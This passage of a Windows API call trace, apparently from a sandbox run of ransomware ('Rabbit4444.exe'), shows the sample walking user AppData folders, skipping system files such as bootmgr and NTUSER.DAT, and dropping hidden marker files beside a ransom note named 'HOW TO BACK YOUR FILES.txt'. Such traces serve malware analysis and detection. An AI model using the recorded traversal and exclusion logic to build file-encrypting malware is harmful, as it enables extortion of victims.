| out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223cdb7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee88fb24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.500] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.500] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.500] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.500] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.500] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9194e327, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223cdb7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee88fb24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.500] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.500] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.500] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.500] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.500] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.500] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee88fb24, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee88fb24, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee8b5da5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.500] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.500] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.500] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee88fb24, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee88fb24, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee8b5da5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.500] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.501] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.501] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.504] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.505] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.505] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.505] CloseHandle (hObject=0x298) returned 1 [0062.505] CloseHandle (hObject=0x27c) returned 1 [0062.505] GetCurrentThreadId () returned 0xd98 [0062.505] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0062.505] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe" [0062.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11f2b8 | out: hHeap=0xe0000) returned 1 [0062.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0062.505] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe" [0062.506] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\" [0062.506] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0062.506] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.509] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.512] FlushFileBuffers (hFile=0x27c) returned 1 [0062.513] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.513] CloseHandle (hObject=0x27c) returned 1 [0062.514] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe") returned 70 [0062.514] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.514] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x950534fc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee94e978, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0062.514] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.514] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.514] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.514] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.514] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x950534fc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee94e978, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.514] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.514] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.514] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.514] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.514] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.514] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee94e978, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee94e978, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee94e978, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.514] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.514] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.514] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x15f8ed9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3981f155, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3981f155, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0062.514] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.514] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.514] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0062.514] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0062.514] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0062.514] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0062.514] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0062.514] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0062.514] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0062.514] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0062.514] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0062.515] lstrcpyW (in: lpString1=0x130ebc6, lpString2="AC" | out: lpString1="AC") returned="AC" [0062.515] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" [0062.515] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\" [0062.515] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0062.515] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.540] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.543] FlushFileBuffers (hFile=0x298) returned 1 [0062.543] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.544] CloseHandle (hObject=0x298) returned 1 [0062.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0062.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x94) returned 0x113418 [0062.544] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0x121fe8 | out: ListHead=0xf6750, ListEntry=0x121fe8) returned 0x0 [0062.544] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15aca2b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd20858aa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x15aca2b, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0062.544] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0062.544] lstrcpyW (in: lpString1=0x130ebc6, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0062.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0062.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0x121860 [0062.545] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122048 [0062.545] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2086018, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x15867c3, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0062.545] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0062.545] lstrcpyW (in: lpString1=0x130ebc6, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0062.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0062.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x118398 [0062.545] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122208 | out: ListHead=0xf68b0, ListEntry=0x122208) returned 0x122368 [0062.545] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2086a4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x15867c3, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0062.545] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0062.545] lstrcpyW (in: lpString1=0x130ebc6, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0062.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0062.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x119208 [0062.546] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x122208 [0062.546] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2087373, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x15867c3, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0062.546] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0062.546] lstrcpyW (in: lpString1=0x130ebc6, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0062.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0062.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118de8 [0062.546] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x121f88 [0062.546] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7138b2cd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7138b2cd, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0062.546] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0062.546] lstrcpyW (in: lpString1=0x130ebc6, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0062.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0062.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa0) returned 0x120c90 [0062.546] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x1222c8 [0062.546] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x94eafafc, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x94eafafc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x94eafafc, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0062.547] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0062.547] lstrcpyW (in: lpString1=0x130ebc6, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0062.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0062.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x124250 [0062.547] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x1221a8 [0062.547] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd21f4513, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x15867c3, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0062.547] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 